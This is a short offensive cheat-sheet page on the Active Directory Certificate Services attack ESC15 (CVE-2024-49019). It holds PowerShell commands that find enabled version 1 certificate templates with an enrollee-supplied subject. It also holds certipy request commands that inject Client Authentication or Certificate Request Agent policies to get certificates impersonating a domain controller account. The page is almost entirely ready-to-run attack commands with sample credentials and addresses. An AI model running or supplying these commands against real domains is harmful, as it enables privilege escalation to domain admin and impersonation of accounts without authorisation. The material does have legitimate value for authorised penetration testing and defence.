ESC15

Inject Application Policies into Version 1 Certificate Templates (CVE-2024-49019)

https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc

Enumerate

Get enabled templates:

PS > $enabledTemplates = Get-ADObject -LDAPFilter "(&(objectClass=pKIEnrollmentService))" -SearchBase "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,$((Get-ADRootDSE).rootDomainNamingContext)" -Properties certificateTemplates | select -ExpandProperty certificateTemplates

Get v1 templates with CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT that are enabled:

PS > Get-ADObject -Filter 'objectClass -eq "pKICertificateTemplate"' -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,$((Get-ADRootDSE).rootDomainNamingContext)" -Property name,msPKI-Template-Schema-Version,msPKI-Certificate-Name-Flag | ? {$_.'msPKI-Template-Schema-Version' -eq 1 -and ($_.'msPKI-Certificate-Name-Flag' -band 0x00000001)} | ? {$enabledTemplates -contains $_.name}

Exploit

ESC15 → ESC1

Abusing Client Authentication:

$ proxychains4 certipy req -u [email protected] -p 'Passw0rd!' -ca CorpCA -target CA01.megacorp.local -target-ip 192.168.1.12 -template VulnTemplate --application-policies '1.3.6.1.5.5.7.3.2' -upn '[email protected]' -sid <DC01_SID> -ns 192.168.1.11 -dc-ip 192.168.1.11 -dns-tcp

ESC15 → ESC3

Abusing Certificate Request Agent:

$ proxychains4 certipy req -u [email protected] -p 'Passw0rd!' -ca CorpCA -target CA01.megacorp.local -target-ip 192.168.1.12 -template VulnTemplate --application-policies '1.3.6.1.4.1.311.20.2.1' -ns 192.168.1.11 -dc-ip 192.168.1.11 -dns-tcp
$ proxychains4 certipy req -u [email protected] -p 'Passw0rd!' -pfx snovvcrash.pfx -ca CorpCA -target CA01.megacorp.local -target-ip 192.168.1.12 -template User -on-behalf-of 'MEGACORP\DC01$' -ns 192.168.1.11 -dc-ip 192.168.1.11 -dns-tcp

Last updated 4 months ago